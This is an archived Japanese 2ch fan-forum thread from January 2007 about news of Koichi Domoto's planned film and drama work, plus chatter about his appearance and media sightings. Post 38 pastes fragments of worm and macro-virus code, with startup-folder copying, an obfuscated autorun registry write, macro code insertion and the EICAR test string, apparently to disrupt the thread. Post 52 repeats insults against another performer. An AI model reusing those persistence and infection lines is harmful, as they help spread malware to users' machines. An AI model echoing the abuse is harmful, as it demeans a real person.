2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

復活 ファーストフード三昧 230

1 :気分はブロードウェイ♪:2007/01/18(木) 10:09:08 ID:XtYb1Kec
復活 ファーストフード三昧 230

コーラは氷いっぱいねー

普通語りをしたい方用光一本スレです。
■別スレ話、担話、他担話、一般人話、お客損接待、ホモネタ厳禁■

前スレ 復活 ファーストフード三昧 229
http://tv8.2ch.net/test/read.cgi/jan/1167667878/
過去ログは>2か>3


2 :ななしじゃにー:2007/01/18(木) 10:10:41 ID:XtYb1Kec
過去ログ

【228】ttp://tv8.2ch.net/test/read.cgi/jan/1166376258/(dat落ち)
【227】ttp://tv8.2ch.net/test/read.cgi/jan/1165383494/(dat落ち)
【226】ttp://tv8.2ch.net/test/read.cgi/jan/1164638167/(dat落ち)
【225】ttp://tv8.2ch.net/test/read.cgi/jan/1164120005/(dat落ち)
【224】ttp://tv8.2ch.net/test/read.cgi/jan/1163004273/(dat落ち)
【223】ttp://tv8.2ch.net/test/read.cgi/jan/1162369560/(dat落ち)
【222】ttp://tv8.2ch.net/test/read.cgi/jan/1160625210/(dat落ち)
【221】ttp://tv8.2ch.net/test/read.cgi/jan/1159540065/(dat落ち)
【220】ttp://tv8.2ch.net/test/read.cgi/jan/1158671130/(dat落ち)
【219】ttp://tv8.2ch.net/test/read.cgi/jan/1158025756/(dat落ち)
【218】ttp://tv8.2ch.net/test/read.cgi/jan/1157415585/(dat落ち)
【217】ttp://tv8.2ch.net/test/read.cgi/jan/1156590017/(dat落ち)
【216】ttp://tv8.2ch.net/test/read.cgi/jan/1155482862/(dat落ち)
【215】ttp://tv8.2ch.net/test/read.cgi/jan/1154753309/(dat落ち)

3 :ななしじゃにー:2007/01/18(木) 10:21:13 ID:HCNGaWw1
>1
乙カレー
気分だけだといいんだがw

4 :ななしじゃにー:2007/01/18(木) 10:33:27 ID:+iy9VcFP
あ、>1・・・乙カレー・・
こんな人稲なときにスレ立てさせちゃってごめんな・・・。

5 :ななしじゃにー:2007/01/18(木) 10:43:16 ID:XlXt2wfF
>1
乙華麗サパッ
>4
アキヤマktkrw

6 :ななしじゃにー:2007/01/18(木) 10:43:39 ID:mrH3TgJq
光一は映画やドラマなどの映像の仕事にも意欲的に取り組む予定
光一は映画やドラマなどの映像の仕事にも意欲的に取り組む予定
ウレシス!

7 :ななしじゃにー:2007/01/18(木) 11:11:35 ID:VQ0P+ycz
>1
オチュ!

映画やドラマ…ウレシス!!
ジャッキーがプロデュース…的な
ホラ吹き蛇兄じゃありませんように(;-人-)

8 :ななしじゃにー:2007/01/18(木) 11:24:23 ID:VAJLIUBH
>1
乙サパッ。

>ジャニー喜多川社長は、光一が今年、映画やドラマなど映像作品にも積極的に出演する方針を明らかにした。

スポニチにもこうやって書いてあった。
蛇兄の虚言じゃありませんように(-人-)

9 :ななしじゃにー:2007/01/18(木) 11:37:14 ID:+zyEJCcD
>1
乙かれサパッ。

蛇兄の言う事は8割引きで聞いておくw
でも色々あったらウレシス。

10 :ななしじゃにー:2007/01/18(木) 11:41:43 ID:dXZ+F0zL
>1
乙華麗。
蛇兄の発言いつものトンデモナイ発言より現実的だから信じておくw

11 :ななしじゃにー:2007/01/18(木) 11:58:55 ID:i1do1IQo
>1
乙です。
今年だからもうスケ抑えてあるんだろうね。
楽しみだよ (*´∀`)

12 :ななしじゃにー:2007/01/18(木) 12:36:04 ID:jzgDiTlw
去年も予定では言ってても結局は
来年に変わったとかでがっかりさせられたしね。

13 :ななしじゃにー:2007/01/18(木) 12:47:02 ID:mrH3TgJq
sage

14 :ななしじゃにー:2007/01/18(木) 12:55:35 ID:6kJAV1Gc
>1
乙華麗パン。
ブロードウェイ云々の話は現在オペラ座の怪人が記録している最多上演数に
帝劇で衝撃が挑戦するって事だね。
ホッとした様な、しない様なw

15 :ななしじゃにー:2007/01/18(木) 13:15:48 ID:3JNgzAPc
映画にドラマ、正に盆と正月だw

16 :ななしじゃにー:2007/01/18(木) 13:32:09 ID:EIimgVo/
喜ぶのはまだ早い。なんせ蛇兄だw
でも10周年計画いろいろありそうだしwktkしながら待ってるおノシ
願わくば映画もドラマもGじゃありませんように…。

17 :ななしじゃにー:2007/01/18(木) 14:19:06 ID:KtLvvYEY
ピタでは流れた?

18 :ななしじゃにー:2007/01/18(木) 15:08:58 ID:JBRWR2iZ
チャオじゃなくて?

19 :ななしじゃにー:2007/01/18(木) 16:02:46 ID:hhYkQzWW
>16
いちいち書くことじゃないだろ。


20 :ななしじゃにー:2007/01/18(木) 16:08:49 ID:HUtpoffK
ニッカン
ジャニー喜多川氏は、デビュー15周年を迎えた堂本に映画とドラマに主演する
プランがあることを明かした。実現すれば映画出演は、94年の「家なき子」以
来13年ぶりとなる。
同氏は「舞台だけではなく映像も頑張ってもらいます」と話した。

サンスポ
ジャニー喜多川社長によると、Kinki Kidsのデビュー10周年となる今年、
光一は映画やドラマなど映像の仕事にも意欲的に取り組む予定といい
フル回転の活躍で魅せてくれそうだ。

スポニチ
ジャニー喜多川氏は、光一が今年、映画やドラマなど映像作品にも積極的に
出演する方針を明らかにした。

21 :ななしじゃにー:2007/01/18(木) 16:32:00 ID:i1do1IQo
映画は13年ぶりなんだねw
大画面ヤシ(;´Д`)ハァハァ

22 :ななしじゃにー:2007/01/18(木) 16:35:41 ID:Ih7Ay56v
>20
wktk(*´∀`)

23 :ななしじゃにー:2007/01/18(木) 16:37:05 ID:+iy9VcFP
蛇兄のいつもの思いつき発言でないことを祈るのみ。
「蛇兄が〜というプランを明かした」ことで実現したことって
どれくらいあったっけ。

24 :ななしじゃにー:2007/01/18(木) 16:40:47 ID:KUCZZeXP
>>1 乙カレー。
たまには蛇兄を信じて勝手に踊ってみるw

25 :ななしじゃにー:2007/01/18(木) 16:46:03 ID:VAJLIUBH
去年の会報によると今年にずれた仕事が少なくとも2つはあるみたいだし
ソロコンでも「来年も色々あると思いますよ」って言ってたから小躍りしとく。
期待しないで期待してるよw

26 :ななしじゃにー:2007/01/18(木) 16:48:47 ID:7/fd288U
ヤシ自身が言ってた去年から今年にずれた仕事や
9月にある何かもあるしな。期待半分で吉報待ってる。

27 :ななしじゃにー:2007/01/18(木) 16:50:29 ID:i1do1IQo
その一つが映画の様な気がするんだがw
抑えようと思っても踊ってしまうよドチドチ。

28 :ななしじゃにー:2007/01/18(木) 16:50:57 ID:7/fd288U
25姐さんとカブった。スマソ。

29 :ななしじゃにー:2007/01/18(木) 17:05:22 ID:zPe/ReOM
5 :名無しさん@お腹いっぱい。:2007/01/18(木) 15:46:12
映画の動員数も過去最高になるよ賞も間違いなく受賞する


30 :ななしじゃにー:2007/01/18(木) 17:06:33 ID:zPe/ReOM
2 :名無しさん@お腹いっぱい。:2007/01/18(木) 15:40:51
光一のドラマに映画楽しみ!
人気があるから視聴率も20%超えで映画も大ヒットだね



31 :ななしじゃにー:2007/01/18(木) 17:08:45 ID:zPe/ReOM
9 :名無しさん@お腹いっぱい。:2007/01/18(木) 16:08:58
光一が映画で賞を受賞しないと
光一婆はもう剛を叩けないよ


32 :ななしじゃにー:2007/01/18(木) 17:10:42 ID:zATh4EZC
もし蛇兄の言う映画が本当だとしても
手袋座という可能性はないのかな?
地方桃にも優しくして欲しいのだが…。

33 :ななしじゃにー:2007/01/18(木) 17:16:33 ID:+iy9VcFP
>32
うわーそれがあったか・・・。
まぁまだ何も正式に発表されてないわけだし。
軽い気持ちでwktkしとくよ。

34 :ななしじゃにー:2007/01/18(木) 17:18:05 ID:anljrLF9
年単位でずれる可能性のある仕事=映画ジャマイカ?
と以前ここで予想したが、本当にあたってるといいなwktk。
映画なら仕事の後毎日通っちゃうよ。

35 :ななしじゃにー:2007/01/18(木) 17:18:56 ID:CGkXyP1b
只でさえヤシは普段から他の人達に比べて
地方で見れない仕事が多いからその可能性もあると思う。

36 :ななしじゃにー:2007/01/18(木) 17:20:06 ID:TDj4mAmQ
欝振りまいてここの空気悪くしてるのがいるな。
正式発表されてないし、今は前向きに考えようって気はないのか。

37 :ななしじゃにー:2007/01/18(木) 17:28:34 ID:Ih7Ay56v
全国公開の映画でありますように(-人-)

38 :ななしじゃにー:2007/01/18(木) 17:32:43 ID:bQum6/j+
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


39 :ななしじゃにー:2007/01/18(木) 17:33:58 ID:3JNgzAPc
仕事情報があると客が来るのは想定内。
9月ドラマ→主題歌→セカンドシングル発売なら最高w

40 :ななしじゃにー:2007/01/18(木) 17:35:15 ID:zhqmV4VP
なんで蛇兄のざれごとで踊ってるの?
深山ばかりか。

41 :ななしじゃにー:2007/01/18(木) 17:37:39 ID:+iy9VcFP
さして踊ってないと思うが。
いつもよりトンデモ発言じゃないから期待してみる?って程度で。

42 :ななしじゃにー:2007/01/18(木) 17:43:48 ID:KtLvvYEY
>18
チャオだったw

でもとすると去年ジャニは、来年は新しい舞台も予定しているとかなんとか言ってたけど、それはどうなるんだ?これが期待外れになるんか?

43 :ななしじゃにー:2007/01/18(木) 17:44:55 ID:QaZTVibO
>40
てかさヤシ自身も今年の仕事の事色々語ってるし
蛇兄の言ってる事は嘘ではないと思うよ

44 :ななしじゃにー:2007/01/18(木) 17:47:51 ID:+iy9VcFP
>42
なんかSHOCKは一人歩きし始めるとかなんとかも言ってたような。

45 :ななしじゃにー:2007/01/18(木) 17:51:23 ID:/T4CqpQd
ヤシの仕事情報があるとウィルスが張られる
誰の仕業かバレバレだな
子供じみたことは止めろ!

46 :ななしじゃにー:2007/01/18(木) 17:57:57 ID:3RMow+6b
蛇兄ガンガレ!超ガンガレ!!

47 :ななしじゃにー:2007/01/18(木) 18:01:36 ID:+iy9VcFP
蛇兄が何をガンガルんだw

48 :ななしじゃにー:2007/01/18(木) 18:06:13 ID:2M/DRy5Z
>39
9月ドラマってことは連ドラじゃなくて単発?

49 :ななしじゃにー:2007/01/18(木) 18:07:55 ID:CGkXyP1b
WSでも思ったけど最近髪が伸びすぎてる。
もう一度ダースのCMの髪型キボン。あの髪型イイ。
すぐ伸びるし若返るから短めが丁度いい。

50 :ななしじゃにー:2007/01/18(木) 18:17:02 ID:FgxSrIZW
そう簡単にカットしにいく時間も暇も今のヤシにはないんだからワガママ言うなよ。

51 :ななしじゃにー:2007/01/18(木) 18:19:22 ID:x+vFcERD
伸びる髪があるだけ有難いと思わないといかん。

52 :ななしじゃにー:2007/01/18(木) 18:21:33 ID:kzz7cFYa
剛は豚になったからドラマが低視聴率になった
剛は豚になったから硬派な男らしい役ができなくなった
剛は豚になったからドラマに出れなくなった
剛は豚になったから踊りが手抜きでどすんどすん踊りになった
剛は豚になったから踊りがかっこ悪く見えるようになった
剛は豚になったから声と歌い方が気持ち悪くなった
剛は豚になったから声と歌い方がネチっこくなった
剛は豚になったから声と歌い方が聴き心地悪くなった


基地外光一ヲバの巣

53 :ななしじゃにー:2007/01/18(木) 18:21:46 ID:1D1WqUZE
アハハ!

54 :ななしじゃにー:2007/01/18(木) 18:22:28 ID:/uMVQGW3
髪といえば今年の衝撃で、キューティクルで天使の輪が光ってるのって
ヤシだけなんだよね。サッラサラで感動したよ。
個人的にあまりレイヤー入れない今の髪好きだな。

55 :ななしじゃにー:2007/01/18(木) 18:27:09 ID:Ih7Ay56v
WS見て、襟足長っ!とは思った。
前髪あとちょっとだけ短くしてくれたら2階からでも顔が見易くてよいのだが。

56 :ななしじゃにー:2007/01/18(木) 18:28:29 ID:Xh4o1f7j
今更だけど、こないだの兄弟で、
「僕太れないんですよね」「男は色々あるからね」て会話があって笑ってたけど、
どういう意味?

57 :ななしじゃにー:2007/01/18(木) 18:37:44 ID:CGkXyP1b
たいした意味じゃないとオモー。
社会人は苦労も多いってことだよ。

58 :ななしじゃにー:2007/01/18(木) 18:40:44 ID:xVycL8w2
ニッカンによれば、映像仕事はG10周年ではなく、ヤシデブ15周年とジャニが言ったようだからソロ仕事だと期待。もちろんG企画も色々あるだろうし、とにかくWktkだ!

59 :ななしじゃにー:2007/01/18(木) 18:53:26 ID:mrH3TgJq
>46 同意

60 :ななしじゃにー:2007/01/18(木) 19:01:35 ID:5Gd97m5a
ニッカンには蛇兄が
「舞台だけでなく映像でも頑張ってもらいます」と語ったってあるよ。
第二関節くらいまで踊ってもいいよね?

61 :ななしじゃにー:2007/01/18(木) 20:30:58 ID:ILt0WckT
G仕事でも暴れるなよ屋ヲバ

62 :ななしじゃにー:2007/01/18(木) 20:36:51 ID:SHo7YFQh
蛇兄の言葉にキレて大暴れしてんのはキモ同人G担じゃん。

63 :ななしじゃにー:2007/01/18(木) 20:43:35 ID:bZ75dkSe
23日の休演日は休めるんだろうか?兄弟収録じゃないよな。
ここでゆっくりしなくちゃ体もたないよ。

64 :ななしじゃにー:2007/01/18(木) 21:22:06 ID:2fphJ+qd
>63 姐さんちっちゃいヤシIDオメ!
衝撃期間中はたぶん休みナシなんだろうな。

65 :ななしじゃにー:2007/01/18(木) 22:28:57 ID:sbKyZ33A
なんか…
相方叩くのみっともない…



66 :ななしじゃにー:2007/01/18(木) 22:52:06 ID:kocgADKI
>64
今までもそうだったんだろうが、
改めて考えるとすさまじいな。

67 :ななしじゃにー:2007/01/18(木) 23:04:04 ID:TiV48/wL
ttp://l-w.jp/hp/?u=temari&p=3&key=

68 :ななしじゃにー:2007/01/18(木) 23:42:45 ID:9ONGlP7k
映像系はGです120%

69 :ななしじゃにー:2007/01/18(木) 23:48:36 ID:CGkXyP1b
実際どうかは分からないけどここで答えの出ない
言い合いしても無駄なんでスルーで。

70 :ななしじゃにー:2007/01/18(木) 23:54:41 ID:JBRWR2iZ
いろんな可能性があるんだな。
「目の前のことに全力を注ぐ」ヤシのように
出てきたものを全力で楽しむとしようw

71 :ななしじゃにー:2007/01/19(金) 00:20:35 ID:ksyvpFD0
蛇網の滝日記にヤシの名前出てるのガイシュツ?

72 :ななしじゃにー:2007/01/19(金) 00:23:24 ID:M3wbXYwv
ヤシヲタは余裕なのに色んなお客損が必死ですねw

>71
ガイシュツじゃないよ。d。

73 :ななしじゃにー:2007/01/19(金) 00:26:10 ID:0Rpl2DBa
>71 d
トランプマジックw


74 :ななしじゃにー:2007/01/19(金) 00:28:31 ID:cLsypH9c
滝日記ワロスww

75 :ななしじゃにー:2007/01/19(金) 00:29:42 ID:UA8y1eaa
やること目白押しでもミラコンDVDはスルーしないよな・・な!

76 :ななしじゃにー:2007/01/19(金) 00:43:38 ID:KKJNGtQh
ミラコンDVDはいっちゃん大事。

77 :ななしじゃにー:2007/01/19(金) 00:47:22 ID:UYVqZHde
滝よ…ジヌンはハゲしくヤシヲタだが、ヤシの汗がタッパでほしいと思ったことはない。断じてないぞ!

78 :ななしじゃにー:2007/01/19(金) 00:52:12 ID:oZNAPgdc
>77
(*´∀`)σ)Д`)

79 :ななしじゃにー:2007/01/19(金) 00:53:22 ID:In3KYwco
アタッシュケースにトランプwww

80 :ななしじゃにー:2007/01/19(金) 01:02:43 ID:mQnk03Zp
開演前に何してんのヤシwww

81 :ななしじゃにー:2007/01/19(金) 01:11:41 ID:KgfDlSTj
本格的にトランプマンになりつつあるなw

82 :ななしじゃにー:2007/01/19(金) 01:47:43 ID:RBM209/z
ちょっと来てー

ヤシの声が聞こえるようだ
しかしいつからヤシはこんな尾も白い奴になったんだW

83 :ななしじゃにー:2007/01/19(金) 06:12:29 ID:Qm75b3IN
アタッシュケース…なんか昔ヤシはよく持ってた気ガス。


84 :ななしじゃにー:2007/01/19(金) 07:05:14 ID:W4CbDi74
>71 d!ミニSHOCKミタス!!

85 :ななしじゃにー:2007/01/19(金) 07:05:51 ID:d2S2DZps
アタッシュケースにパソコン入れてるんじゃない?

86 :ななしじゃにー:2007/01/19(金) 07:52:13 ID:5dBFR/UK
ヤシカバエエ。
滝裏山。

87 :ななしじゃにー:2007/01/19(金) 08:56:53 ID:fQhl/hKF
呼び方「ちょっと来て〜」がツボ

88 :ななしじゃにー:2007/01/19(金) 09:07:29 ID:t6ydj3Vj
また「選んでちょ」とか言ってたのかな(*´Д`)

89 :ななしじゃにー:2007/01/19(金) 09:17:40 ID:bgi7eEtD
滝連電車の中で見て吹いてもうたw
滝までマチダさんみたいなこと言い出して・・・とオモタらトランプマソwww
ヤシがオモロ過ぎるw

90 :ななしじゃにー:2007/01/19(金) 09:33:58 ID:JL9tmB9E
紺の時みたいに嬉しそうにマジックやるヤシが目に浮かぶ。
どっちが先輩だよw

91 :ななしじゃにー:2007/01/19(金) 10:23:50 ID:npN37ayR
ちょこんと正座かな?

92 :ななしじゃにー:2007/01/19(金) 10:49:42 ID:eDBti5Uc
ローカルネタ
中京テレビで15:50からやるエミエミという番組ラテ欄に名前アリ
鯱近辺姐さん捕獲ヨロ
あと高知新聞のインタ記事アリ

93 :ななしじゃにー:2007/01/19(金) 11:16:42 ID:C/LJP+Zg
>92
トン、トン、トン!

94 :ななしじゃにー:2007/01/19(金) 11:51:14 ID:ZbvBY+Km
>92
d!鯱だが見落としてた。
昨日のwsのかな?

95 :ななしじゃにー:2007/01/19(金) 14:02:08 ID:Gt3B3qNV
WS見逃したorz
ようつべにうぷされるかな?

96 :ななしじゃにー:2007/01/19(金) 15:45:34 ID:5JvKuhdQ
蛇網の隣の写真に後ろでヤシがたばこ吸ってるのが写ってるよ。

97 :ななしじゃにー:2007/01/19(金) 15:50:59 ID:iBBUyQZ5
>96
奥で見てきた。ピンボケがおしいけどイロポ(*゚д゚*)

98 :ななしじゃにー:2007/01/19(金) 15:54:25 ID:XzvhUU6Q
衝撃稽古前だけど、禁煙やめたてたんだね。

99 :ななしじゃにー:2007/01/19(金) 16:01:38 ID:kIVmWd7a
>96
隣が緑シャポーのやつ?

100 :ななしじゃにー:2007/01/19(金) 16:10:44 ID:Cs36K5IT
>98
禁煙できなかった事は前にヤシが会報で話してるよ。
何をいまさら。

101 :ななしじゃに:2007/01/19(金) 16:20:50 ID:iRv7M4Y8
ローカルの芸能ニュースコーナーに前田忠明さんが生出演してて
ヤシの事褒めてました 毎年衝撃終了後の囲み取材の時に怪我し
ないよう気をつけてよ!って必ず言ってるんだって
 

102 :ななしじゃにー:2007/01/19(金) 16:21:30 ID:hfid3IYw
>96
トン。奥で見てきた。
ヤシの煙草吸ってる仕種、指先とかイロポでスチだ。

103 :ななしじゃにー:2007/01/19(金) 16:28:40 ID:2nyqosQz
>101
d!
ついでにリポーターの山崎○代さんも自分のブログで会見の様子を書いて
ヤシのこと褒めてくれてるよ。

104 :ななしじゃにー:2007/01/19(金) 16:32:38 ID:q/I7Yv70
>100
干菓子兄サンとの賭けに関係なく、衝撃期間中は禁煙してなかった?
98はそのこと言ってるんジャマイカ。

105 :ななしじゃにー:2007/01/19(金) 16:35:48 ID:ZbvBY+Km
>92の鯱地方番組引っ張ってスマソだが
帝劇ダースてあるんだなwシールだけでもプレミアもんみたく思える地方桃w
来月ゲトしよう!塚グッズくらいプレゼント汁ーチューキョーよ!ケチ杉。

106 :ななしじゃにー:2007/01/19(金) 16:45:35 ID:xqgcCVAU
隣…ね。
相変わらずだね。

107 :ななしじゃにー:2007/01/19(金) 16:51:34 ID:fk6zOVl/
隣表記はこのスレでは使わないよ。
客だか深山だかに何で釣られてるの?

108 :ななしじゃにー:2007/01/19(金) 16:52:18 ID:x3xB+pkW
>106
逝け

109 :ななしじゃにー:2007/01/19(金) 17:01:14 ID:2nyqosQz
>107
このスレで誰をどう呼ぶかなんてイチイチ決めてないけど?
表記を気にするほうが浮いてる。

110 :ななしじゃにー:2007/01/19(金) 17:05:04 ID:63GDUCKA
>105
帝劇ダースw
スプーンに続き、お土産ケテーイかw

111 :ななしじゃにー:2007/01/19(金) 17:10:56 ID:6/HPw7W0
帝劇ダースは去年もあったよ。
売り切れの時があるからゲトしたい姐さんはお早めにw

112 :ななしじゃにー:2007/01/19(金) 17:16:37 ID:fk6zOVl/
>109
深山?半年ロムって空気嫁。
>111
あれ帝劇シールが貼ってあるだけなんだけどつい買っちゃうよw



113 :ななしじゃにー:2007/01/19(金) 17:24:20 ID:GXyD+94o
でも帝劇ダース
ヤシCM商品じゃないんだよなぁ
普通のダースだといいのに

114 :ななしじゃにー:2007/01/19(金) 17:35:23 ID:j7A2xigr
隣なんて悪気もなきゃ普通に使う言葉なのに
過剰に反応してる風紀厨てバカ?

115 :ななしじゃにー:2007/01/19(金) 17:36:24 ID:kv7LcywR
竜馬国の地方新聞インタ、すっぴんニット帽のヤシでした。
なんか、柔らかな雰囲気でカ〇エエ。

116 :ななしじゃにー:2007/01/19(金) 17:41:22 ID:CKeXhO4j
>115
トン。
裏山。テラミタス(*´∀`)

117 :ななしじゃにー:2007/01/19(金) 17:47:11 ID:fk6zOVl/
>113
そういや今年は違うんだったね。
>115
地方紙独自取材なのか?裏山。

118 :ななしじゃにー:2007/01/19(金) 18:01:09 ID:XBzOkjVB
屋ヲバは巣に帰ってね

119 :ななしじゃにー:2007/01/19(金) 18:02:21 ID:LhtErSdN
>ID:fk6zOVl/
↑ナリキレてない深山の見本w

120 :ななしじゃにー:2007/01/19(金) 18:05:41 ID:63GDUCKA
ここんとこニット帽がお気に入りなんだね。
何にしても見たい。

121 :ななしじゃにー:2007/01/19(金) 18:14:13 ID:Gcvb3boy
>115
ニット帽の先がとんがってて、眉も帽子でかくれてるからチョピンくんみたいだとオモタw

共同通信網に入ってるから、もしかしたら共同通信網の地方紙は明日あたり載る
かもしれない。


122 :ななしじゃにー:2007/01/19(金) 18:22:57 ID:fk6zOVl/
>121
トン!加盟新聞社は↓これだね。
ttp://news.kyodo.co.jp/info/link1.html
帝都だと山系日系かな?載るといいな。

123 :ななしじゃにー:2007/01/19(金) 18:23:09 ID:ZopmY7AT
チョピン君ってw

ピチョン君?

124 :ななしじゃにー:2007/01/19(金) 18:24:48 ID:ZopmY7AT
ピチョン君じゃないの?
チョピン君ってw

125 :121:2007/01/19(金) 18:28:25 ID:Gcvb3boy
ぴちょんくんですた。面目ないw

126 :ななしじゃにー:2007/01/19(金) 19:06:02 ID:JreZUYVc
屋ヲバウザスウザス。
だから嫌われるんだよ。

127 :ななしじゃにー:2007/01/19(金) 19:16:45 ID:sSqwMc3D
>122
地元紙入ってル━━━━━━(゚∀゚)━━━━━━!!!
ぴちょんくんヤシテラミタス。

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)